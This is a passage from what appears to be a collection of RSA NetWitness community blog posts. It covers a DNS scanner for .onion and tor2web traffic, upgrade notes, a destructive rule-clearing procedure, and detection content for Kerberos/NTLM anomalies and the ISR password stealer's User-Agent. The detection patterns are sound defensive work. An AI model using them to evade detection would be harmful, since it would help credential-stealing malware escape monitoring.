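    "2016-12-14T10:02:30Z 10.1.2.9 query[AAAA] cdn.example.net",
    "2016-12-14T10:03:00Z 10.1.2.7 query[A] abcdefghijklmnop.onion",
]

if __name__ == "__main__":
    for client, qname, verdict in scan_dns_log(SAMPLE_LOG):
        print("%s -> %s [%s]" % (client, qname, verdict))
```

The gateway check matters because a referral victim's browser never resolves the .onion name itself: it resolves the tor2web gateway's domain, so a block list that only contains .onion would miss exactly the traffic the post describes.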


Thanks for the continued support from Michael Sconzo, Ray Carney, and Rotem Salinas, and a special thanks to MalwareHunterTeam @malwrhunterteam for all the DMs.




Per request from external teams, I experimented with the NetWitness Suite/Security Analytics 10.6.2 Upgrade in mixed-mode installation.


Case 1: SA 10.6.2 and a new host in 10.5.2


  • SA server has been upgraded from 10.6.0 to 10.6.2 using the split zip files.
  • Another host (Decoder) has been built from the 10.5.0 OVA and was upgraded to 10.5.2. 


  • SA 10.6.2 - to - Decoder 10.5.2 provisioning was successful.
  • Upgrade to 10.6.2  is available on the HOST screen and the upgrade was successful. 


Case 2: SA 10.6.2 and new host in 10.6.0


  • SA server has been upgraded to 10.6.2 using the split zip files
  • A new host (Concentrator) has been built from the 10.6.0 OVA.


  • SA 10.6.2 - to - Decoder 10.6.0 provisioning was successful.
  • The new 10.6.0 host can be upgraded using rpms in SA's repo. 


Case 3: WLC on Win2K12 and SA 10.6.0 / 10.6.2 setups


  • WLC on Win2K12: added the WLC to the 10.6.0 / 10.6.2 setup and tested the functionality of the LC; all events could be seen on the Concentrator.


  • Upgraded the WLC to 10.6.2 on WIN2K12 and noticed that the NwLogCollector service crashes after the upgrade (ASCO-27227).

PEM file issue

If you are upgrading from a new 10.6.0.x system (from a 10.6.0 image) to 10.6.2 for the first time and you are using SMCUpdate, you must run the following command to create a PEM file.

# touch /etc/pki/CA/certs/RSACorpCAv2.pem

This workaround has been noted in the 10.6.1 Update Instructions (page 15, Task 8) but not in the 10.6.2 Update Instructions. 

This isn't an issue if you are using 10.6.2 upgrade zip files.

The issue won't be fixed until the next image is released.


Note: The background image is Lake Assal in Djibouti. I'm dreaming of a sunny and warm place...

Working with Microsoft event IDs? Ever use the excellent site Ultimate Windows Security to track down event IDs?


Here is a context menu to enable right-click actions from the metakey to pivot into the website for security events.  It helps cut out the select, ctrl+c, alt+tab, ctrl+v routine.


administration > system > context menu

The action definition (angle-bracket values are placeholders to fill in for your deployment):

    {
        "displayName": "[MS EventID Lookup]",
        "cssClasses": [
            "<meta key that carries the Event ID>"
        ],
        "description": "",
        "type": "UAP.common.contextmenu.actions.URLContextAction",
        "version": "1",
        "modules": [
            "<UI module the action appears in>"
        ],
        "local": "false",
        "groupName": "externalLookupGroup",
        "urlFormat": "<Ultimate Windows Security event lookup URL>{0}",
        "disabled": "",
        "id": "MSEventIDLookup",
        "moduleClasses": [
            "<view class the action is attached to>"
        ],
        "openInNewTab": "true",
        "order": ""
    }

Recently I had a customer who was unable to remove their Application rules from a packet decoder as part of removing the old IR 3.5 content.


If they tried to remove all the IR content rules at once, the first Apply took them to the review screen, which shows what is being removed and what will remain; on that screen, however, the Apply button was not active.


If they tried to remove only a few rules at a time, the Apply button on the review screen was active; however, upon reloading the Application Rules tab, all the deleted rules were back again.


To resolve the issue I made a backup of their Application rules and then navigated to the Explorer view of the packet decoder.


WARNING: This is a destructive clearing of all Application rules on the decoder. You will only want to do this if you are experiencing this issue or something similar. Make sure you have a back up copy of your current rule set.



Right click on application and click on Properties.



Select "clear" from the dropdown and then press Send in the right-hand corner of the Properties screen. You will see a success message in the information box.

Michael Sconzo

Content Update

Posted by Michael Sconzo Employee Dec 14, 2016

Here's the latest in Content Updates. They enable expanded malware detection as well as add additional features for DNS traffic analysis and analysis around domains.


Application Rule Updates

  • Dyzap - Related Blog post
  • Update of Cerber Ransomware rule


ESA Rule Updates

  • Update of Cerber Ransomware rule


Feed Updates


Parser Updates

  • DNS_lua
    • File detection in DNS traffic
    • Base64 and Base36 TXT record detection
  • TLD_lua options file
    • Ability to set local domains and TLDs for identification to whitelist the domains/TLDs from the logic that looks for suspicious domain structure.

[This content is now available OOTB from RSA Live]

The comments below have the links to locate information about the content.


Based on some documents and blog posts that I ran across, these charts and rules were created to alert on and display security-relevant events from RSA SecurID / Authentication Manager 8.2+. The reporting and charting is not intended to replace the built-in logging for user events; it is more of an early warning system to detect potentially critical security events that the SOC should be aware of.


As always, test and post comments with suggestions or improvements.


1 Dashboard

8 charts

16 rules

1 list


All import under the same folder structure:

RE > Log > SecurID


RSAACESRV parser is required to be installed and enabled on log decoders


Syslog log transfer is what was configured in my testing environment.


Changes to the OOTB index will be required to index the result metakey.

Included are the table-map-custom and index-concentrator-custom changes that will be required.


Has not been tested with 7.x or earlier versions of 8.x (8.0/8.1).


ISR is a password stealer that has been spreading through phishing attacks. The malware targets different browsers and programs in order to steal the victim's passwords. In this blog post we will discuss how to detect ISR traffic using RSA NetWitness.


ISR uploads the stolen data to compromised websites, as shown in the screenshot below.



The unique user-agent string used in this HTTP GET request is common among ISR variants:



Assuming the appropriate meta keys are enabled, the following query can be used to detect ISR network activity:

            service = 80 && client = 'HardCore Software For : Public'
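The same check applied outside NetWitness, as an added example that is not part of the original post: it assumes, as the query implies, that `service = 80` marks sessions identified as HTTP and that the `client` meta key carries the HTTP User-Agent. The session structure and the sample requests are constructed.

```python
# Added example (not from the original post): apply the ISR detection logic
# from the post to a few constructed HTTP requests. "service" mirrors the
# NetWitness service meta (80 = session identified as HTTP) and the match is
# on the exact User-Agent string, as in the query.
from dataclasses import dataclass
from typing import List, Optional

ISR_USER_AGENT = "HardCore Software For : Public"


@dataclass
class Session:
    """Stand-in for a captured session: identified service plus raw HTTP request."""
    service: int
    request: bytes


def user_agent(request: bytes) -> Optional[str]:
    """Return the User-Agent header value, or None if the request has none."""
    head, _, _ = request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"user-agent":
            return value.strip().decode("latin-1")
    return None


def is_isr_session(session: Session) -> bool:
    """Equivalent of: service = 80 && client = 'HardCore Software For : Public'."""
    return session.service == 80 and user_agent(session.request) == ISR_USER_AGENT


def find_isr_sessions(sessions: List[Session]) -> List[int]:
    """Indexes of the sessions that match the ISR signature."""
    return [i for i, s in enumerate(sessions) if is_isr_session(s)]


# Constructed sample traffic (hosts and paths are placeholders, not real IOCs).
SAMPLE_SESSIONS = [
    Session(80, b"GET /gate.php?data=x HTTP/1.1\r\nHost: example.invalid\r\n"
                b"User-Agent: HardCore Software For : Public\r\n\r\n"),
    Session(80, b"GET / HTTP/1.1\r\nHost: example.invalid\r\n"
                b"User-Agent: Mozilla/5.0\r\n\r\n"),
    # Same User-Agent, but the session was not identified as HTTP (service 0):
    # the query would not match it either. Header names are case-insensitive.
    Session(0, b"GET / HTTP/1.1\r\nHost: example.invalid\r\n"
               b"user-agent: HardCore Software For : Public\r\n\r\n"),
    Session(80, b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"),
]

if __name__ == "__main__":
    print(find_isr_sessions(SAMPLE_SESSIONS))  # -> [0]
```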


More information about ISR can be found on the Intel Security blog. Scan results for an ISR binary can be found here.


All the IOCs from those sessions were added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

To find those IOCs using RSA NetWitness, please refer to this post.

Recently, RSA completed and certified a new threat intelligence partnership with Symantec as part of our RSA Ready program.  This partnership provides the opportunity to leverage Symantec DeepSight Intelligence with the RSA NetWitness Suite platform.  


This new certified partner can be utilized by the RSA NetWitness Suite to offer security analysts real-time context about an investigation so they can more quickly detect and respond to an incident.


For a detailed description about how to integrate Symantec DeepSight Intelligence into the RSA NetWitness Suite refer to the online integration documentation found here.


Also, for additional details and resources, please refer to the RSA Ready Partner Program.

[Updated with a 4th use case around NTLM failed authentications with unusual failure codes (result.code) ]


After seeing a few recent Twitter conversations regarding Kerberos odd events, I decided to see how NetWitness would see those events and potentially report and chart them.


This is the output of ideas from a few web pages and Twitter posts. Please test these out in your environment and let me know if there are any improvements or additional filtering that can be done to improve the fidelity of the output.


I don't have a full domain to test with so my data set is limited and there are probably improvements that can be made.


The four areas that were looked at were:

  • Kerberos Ticket Encryption Types
  • Odd Kerberos Failure codes
  • Kerberos Target Domains
  • Odd NTLM Failure codes


The included report can be run to give you ideas of where the information came from and potentially other items to look for in the dataset (apparently ::ffff is a legitimate failure and could be filtered from the Ticket Encryption types). There were also potential ways to detect Golden/Silver tickets, as well as Mimikatz, with the Target Domain (but I have yet to validate those).
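A summary of the first three areas over sample data, as an added example that is not part of the original post or its report pack: it uses the data field names of the Windows 4769 (service ticket request) event and the standard Kerberos encryption type numbers; the events themselves and the known-domain list are constructed.

```python
# Added example (not part of the original post): summarise constructed Windows
# Kerberos service-ticket events (Event ID 4769) by ticket encryption type,
# failure code and target domain, which is what the post's report charts.
# Field names follow the 4769 event's own data names; the events are made up.
from collections import Counter
from typing import Dict, List, Set

# Kerberos encryption type numbers as written in TicketEncryptionType.
ETYPE_NAMES = {
    "0x11": "AES128-CTS-HMAC-SHA1-96",
    "0x12": "AES256-CTS-HMAC-SHA1-96",
    "0x17": "RC4-HMAC",
}
LEGACY_ETYPES = {"0x17"}   # RC4 tickets are the ones worth charting separately


def summarise_4769(events: List[Dict[str, str]], known_domains: Set[str]) -> Dict[str, object]:
    """Return per-etype counts, non-zero failure codes, RC4 events and unknown target domains."""
    by_etype = Counter(e.get("TicketEncryptionType", "?") for e in events)
    # Status 0x0 means the request succeeded; anything else is a failure code.
    failures = Counter(e["Status"] for e in events if e.get("Status", "0x0") != "0x0")
    legacy = [e for e in events if e.get("TicketEncryptionType") in LEGACY_ETYPES]
    unknown = sorted({e["TargetDomainName"] for e in events
                      if e.get("TargetDomainName", "").upper() not in known_domains})
    return {
        "by_etype": {ETYPE_NAMES.get(k, k): v for k, v in by_etype.items()},
        "failure_codes": dict(failures),
        "legacy_etype_events": legacy,
        "unknown_target_domains": unknown,
    }


SAMPLE_EVENTS = [  # constructed sample records, not real log data
    {"TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "cifs/fs01",
     "TargetDomainName": "CORP.EXAMPLE", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "svc_backup@CORP.EXAMPLE", "ServiceName": "MSSQLSvc/db01",
     "TargetDomainName": "CORP.EXAMPLE", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "krbtgt",
     "TargetDomainName": "CORP.EXAMPLE", "TicketEncryptionType": "0x12", "Status": "0x7"},
    {"TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "cifs/fs01",
     "TargetDomainName": "corp.example", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "eve@CORP.EXAMPLE", "ServiceName": "cifs/fs01",
     "TargetDomainName": "OTHER.EXAMPLE", "TicketEncryptionType": "0x17", "Status": "0x0"},
]

if __name__ == "__main__":
    # Domain comparison is case-insensitive, so "corp.example" counts as known.
    print(summarise_4769(SAMPLE_EVENTS, {"CORP.EXAMPLE"}))
```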


Included are:

  • Dashboard (1)
  • Charts (4)
  • Report (1)
  • Rules (4)
  • Lists (2)

The lists can be used to help focus the odd Kerberos failure codes if required.

All import into the same folder structure:

Log -> Windows


As always, test and let me know if this provides value and helps bring visibility to a part of your network that is important.


The new Investigation Data Model and Hunting Pack, with the associated Hunting Guide, provide a new way for analysts to interact with their data and hunt for threats. The attached PDF provides a summary of the key points and the changes you need to make to your RSA NetWitness deployment to make the most of the new content. Happy Hunting!

EDIT 20161214: Fixed a typo on page 21. Thanks Jim!
